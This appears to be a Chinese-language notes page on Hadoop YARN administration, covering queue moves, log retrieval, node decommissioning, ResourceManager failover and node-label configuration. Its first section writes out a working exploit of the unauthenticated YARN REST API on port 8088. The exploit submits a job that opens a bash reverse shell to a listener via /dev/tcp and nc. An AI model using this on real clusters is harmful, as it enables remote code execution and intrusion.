Contents
  1. 1. 8088挖矿漏洞
  2. 2. application修改队列
  3. 3. 查看日志
  4. 4. 节点服役退役
    1. 4.1. 节点服役
    2. 4.2. 节点退役
      1. 4.2.1. yarn
  5. 5. 主备切换
  6. 6. node-label
    1. 6.1. 启动配置

8088挖矿漏洞

发起获取appID
curl -X POST http://10.33.21.190:8088/ws/v1/cluster/apps/new-application

新建任务信息文件1.json反弹shell
{
‘application-id’: ‘application_1639358619460_0019’,
‘application-name’: ‘get-shell’,
‘am-container-spec’: {
‘commands’: {
‘command’: ‘/bin/bash -i >& /dev/tcp/10.17.41.129/8888 0>&1’
}
},
‘application-type’: ‘YARN’
}

启动监听
nc -lvvp 8888

发起任务
curl -s -i -X POST -H ‘Accept: application/json’ -H ‘Content-Type: application/json’ http://10.33.21.190:8088/ws/v1/cluster/apps –data-binary @1.json

application修改队列

yarn application -movetoqueue application_1667986310829_98856 -queue spark

查看日志

Yarn:
http://xx:8088/cluster?user.name=yarn
http://xx:8088/proxy/application_1660270769302_1399007
hdfs dfs -ls /spark2-history/ |grep application_1660270769302_1399007
hdfs dfs -ls /app-logs/xx/logs/application_1660270769302_3305625 |head

yarn logs -appOwner xx -applicationId application_1660270769302_3305625 -out t1
find t1 -name “01_000001

节点服役退役

节点服役

hadoop/etc/hadoop/dfs.include
hdfs dfsadmin -refreshNodes

节点退役

yarn

echo “10.17.41.133” > nodemanager.excludes

vi yarn-site.xml

1
2
3
4
<property> 
<name>yarn.resourcemanager.nodes.exclude-path</name>
<value>/data/hadoop-2.8.3/etc/hadoop/nodemanager.excludes</value>
</property>

yarn rmadmin -refreshNodes -g [timeout in seconds] -client|server

节点NM进程会自动结束

主备切换

yarn rmadmin -getAllServiceState
yarn rmadmin -transitionToStandby –forcemanual rm2
yarn rmadmin -transitionToActive –forcemanual rm1

node-label

  • 一个节点只有一个标签,默认属于DEFAULT
  • 通过配置队列使用标签资源的比例
  • 只有Capacity Scheduler调度器支持Node Labels分区调度
  • 标签分为排他和非排他
    • 排他:只属于该标签资源
    • 非排他:标签也属于DEFAULT

启动配置

yarn-site.xml

1
2
3
4
5
6
yarn.node-labels.fs-store.root-dir|hdfs:///yarn/node-labels/
yarn.node-labels.enabled|true
yarn.node-labels.configuration-type| “centralized”, “delegated-centralized” or “distributed”. Default value is “centralized”.

yarn.resourcemanager.scheduler.class|org.apache.hadoop.yarn.server.resourcemanager.scheduler.capacity.CapacityScheduler

capacity-scheduler.xml

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<configuration>
<property>
<name>yarn.scheduler.capacity.root.queues</name>
<value>default,DEMO</value>
</property>
<property>
<name>yarn.scheduler.capacity.root.DEMO.capacity</name>
<value>0</value>
</property>
<property>
<name>yarn.scheduler.capacity.root.a17.maximum-applications</name>
<value>20</value>
</property>
<property>
<!-- 配置可访问分区。逗号分割的分区列表,必须 -->
<name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels</name>
<value>DEMO</value>
</property>
<property>
<!-- 配置队列所有祖先队列DEMO分区容量,必须 -->
<name>yarn.scheduler.capacity.root.accessible-node-labels.DEMO.capacity</name>
<value>100</value>
</property>
<property>
<!-- 配置队列在DEMO分区容量,必须 -->
<name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.capacity</name>
<value>100</value>
</property>
<property>
<!-- 配置队列在DEMO分区最大容量,可选,默认为100 -->
<name>yarn.scheduler.capacity.root.myqueue.accessible-node-labels.DEMO.maximum-capacity</name>
<value>100</value>
</property>
<property>
<!-- 配置队列作业容器请求默认提交分区,可选,默认为DEFAULT分区"" -->
<name>yarn.scheduler.capacity.root.myqueue.default-node-label-expression</name>
<value>DEMO</value>
</property>
<configuration>

yarn rmadmin -refreshQueues

1
2
3
4
5
6
7
8
9
10
11
## 操作命令

```shell
yarn rmadmin -addToClusterNodeLabels "label_1(exclusive=true/false),label_2(exclusive=true/false)" #默认为排他

yarn cluster --list-node-labels

**Centralized**
yarn rmadmin -replaceLabelsOnNode "主机名[:port]=label1 主机名=label2"

yarn node -status <NodeId>